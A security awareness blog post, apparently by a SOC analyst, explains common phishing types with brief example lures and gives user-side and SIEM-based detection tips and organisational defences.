Understanding Phishing Attacks, A Simple Guide to Phishing

Ever clicked on a link in an email that looked legit but felt... off?
What if I told you — that one click could’ve compromised your entire system?

Welcome to the world of Phishing Attacks, where cybercriminals don’t break in — they trick you into opening the door yourself.

---

🧠 What Is a Phishing Attack?

A Phishing Attack is when a hacker pretends to be someone trustworthy (like your bank, a coworker, or a well-known brand) to steal sensitive information — like passwords, credit card numbers, or login credentials.

They don’t hack your system.
They hack your trust.

📌 These attacks often come via:

• Emails

• Text messages (SMS)

• Phone calls

• Fake websites

Their goal is simple: make you take an action — click a link, download a file, or share private information.

---

🎭 Common Phishing Techniques (Explained Clearly)

1. Email Phishing

The attacker sends a generic message pretending to be from a big company.

🧪 Example:

Subject: “Your Netflix account is on hold!”
Link: netfl1x.verify-payments.info (fake URL)

How it tricks you: The email looks like Netflix, uses their logo and color, and scares you into clicking.

---

2. Spear Phishing

The attacker researches the victim and sends a personalized message.

🧪 Example:

“Hi Bilal, your security dashboard report failed to sync. Reconnect it here.”

Why it works: It's highly targeted — your name, your tool, your job.

---

3. Whaling (CEO Fraud)

Targets high-ranking individuals in a company.

🧪 Example:

Fake CEO emails the Finance team: “Urgent: Transfer $10,000 to vendor by EOD.”

---

4. Smishing (SMS Phishing)

Attacks delivered via mobile texts or messaging apps like WhatsApp.

🧪 Example:

“Your package was undeliverable. Reschedule here: [phishy-link]”

---

5. Vishing (Voice Phishing)

Fraudsters call you pretending to be from your bank, IT team, or government.

🧪 Example:

“This is the bank. We detected fraud. Can you verify your OTP?”

---

🔍 How to Detect a Phishing Attack (SOC + User Perspective)

✅ 1. Check the Sender’s Email

As a SOC Analyst, my first step is always to carefully check the email address of the sender. Does it match the real domain of the organization? For example, micros0ft.com is clearly a fake if you're expecting microsoft.com. Even if the display name says “Google”, the actual email could be security@googl-login-alert.com — which is a red flag.

✅ 2. Look at the Subject and Email Body Carefully

I read the subject line and the body of the message slowly. If I notice urgency, fear tactics, or emotional manipulation like “Your account will be disabled in 30 minutes” — I immediately flag it. These are pressure tactics used to make users act without thinking.

✅ 3. Analyze the Link

If the email has a link, I don’t click it. Instead:

• I hover over it (on PC) or long press (on mobile) to see the real URL.

• Then I copy the link and paste it in a plain text editor or inspect it manually in a secure browser tab.

• If the link leads to an unknown domain or uses URL shorteners or misspelled domains, I flag it.

✅ 4. Check for Attachments

If there is an attachment, I examine the file extension. Dangerous ones include .exe, .scr, .bat, .js, .zip, or even .doc/.xls with macros. Unless I’m expecting a file from this person, I won’t open it — and I’ll raise an alert if needed.

✅ 5. Check Spelling, Grammar, and Format

Professional organizations almost never make obvious mistakes in grammar, spelling, or formatting. An email filled with errors is often a phishing attempt. Even logos or visual formatting that look “off” can be signs.

---

👨‍💻 For SOC Analysts — How to Detect Phishing in Logs

🔍 In Splunk, ELK, or any other SIEM:

• Detect links pointing to newly registered or suspicious domains using DNS logs.

• Monitor use of PowerShell with encoded commands (like base64) — often used to execute malware.

• Investigate login attempts from foreign IPs, especially after normal working hours.

• Correlate logs for multiple failed login attempts followed by a successful one — this may suggest brute-force or credential stuffing.

📘 Pro Tip: Integrate with Threat Intelligence Feeds (like AlienVault, AbuseIPDB) to flag emails or domains previously seen in phishing campaigns.

---

🛡️ How to Defend Against Phishing

🧑‍💻 For Users:

• Never click on links from unknown senders

• Don’t enter credentials unless you verify the source

• Avoid sharing OTPs or sensitive data via SMS or email

• Always double-check sender identity by reaching out through official company channels

🧑‍💼 For Organizations:

• Enforce Multi-Factor Authentication (MFA)

• Use advanced spam filters and email security gateways

• Provide ongoing security awareness training to employees

• Analyze email headers and message paths

---

🎯 Final Thoughts

Phishing is not just technical — it's emotional engineering.

It works because it targets people’s fear, urgency, trust, and curiosity.

Whether you’re a student, SOC intern, or junior analyst —
knowing how phishing works makes you 10x more secure.

---

💬 Have you seen a phishing email recently? Share your story below — let’s help others avoid falling for the bait!